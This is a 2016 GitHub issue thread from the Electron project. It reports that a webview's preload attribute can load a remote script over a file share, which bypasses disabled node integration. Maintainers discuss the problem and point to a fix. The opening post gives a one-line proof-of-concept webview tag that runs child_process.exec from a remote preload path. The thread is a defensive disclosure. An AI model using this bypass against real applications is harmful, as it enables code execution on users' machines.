### ISSUE TITLE
Disabling nodeintegration can be bypassed by loading remote scripts in Preload

### ISSUE THREAD

**Issue by laramies** [electron/electron#5173] opened 2016-04-15 08:49 UTC
Assuming that windows and webviews inherit the nodeintegration setting from parents, and nodeintegration is disabled, is still possible to run JS with full node integration via the Preload function.

`<webview src="data:text/html,<script>require('child_process').exec('notepad.exe',function(){})</script>" preload="file:\\192.168.1.11\temp\test.js"></webview>
`
Currently seems that the only scheme accepted is file://, despite documentation saying that also asar:// is supported.

What will be the best way to prevent Preloading files from the network?  asar:// was a local reference only? If so will be good to have that one back. Otherwise is there a way to implement a filter with event handling in the main.js to block remote files ?

Is there a way to enable preload in main.js only and disable it in all renderers?

Will  [protocol ](http://electron.atom.io/docs/v0.37.5/api/protocol/#protocol) module work to handle file:// in Preloads?

* Electron version: 0.37.5
* Operating system: Windows 10

**Comment by zcbenz** [comment] 2016-04-15 13:18
This is a duplicate of #3943.

**Closed by zcbenz** 2016-04-15 13:18 UTC

**Comment by laramies** [comment] 2016-04-15 15:48
This is different than https://github.com/electron/electron/issues/3943, this shows how you can still run Node code via loading a preload JS remotely, bypassing the nodeintegration setting on the webview.
It's about Preload letting load remote code.

**Comment by zcbenz** [comment] 2016-04-16 02:27
@laramies This problem will be gone after we disabled webview when node integration is off, even if we fixed the preload script problem, there are still various ways to attack since it is possible to have access to the low level webContents API.

**Comment by laramies** [comment] 2016-04-19 14:41
@zcbenz What do you mean gone when disabled webview when Node integration is off?  If the Node integration is off, Preload still will have nodeintegration enabled.  Or I am missing something?  Regarding the other various ways could you please provide another example?

**Comment by zcbenz** [comment] 2016-04-20 00:53
When webview is disabled there is no way for remote content to run preload script.

**Comment by laramies** [comment] 2016-05-17 13:12
Hi @zcbenz  any way on currently preventing Preload from loading a remote file ? We have tried using a file interceptor for protocol file:// but Preload calls are not being intercepted, all the rest are being intercepted as expected.

**Comment by laramies** [comment] 2016-05-17 14:13
@zcbenz  ignore it I just saw that you just pushed the disabling of webview  https://github.com/electron/electron/pull/5559 :)  Many thanks!
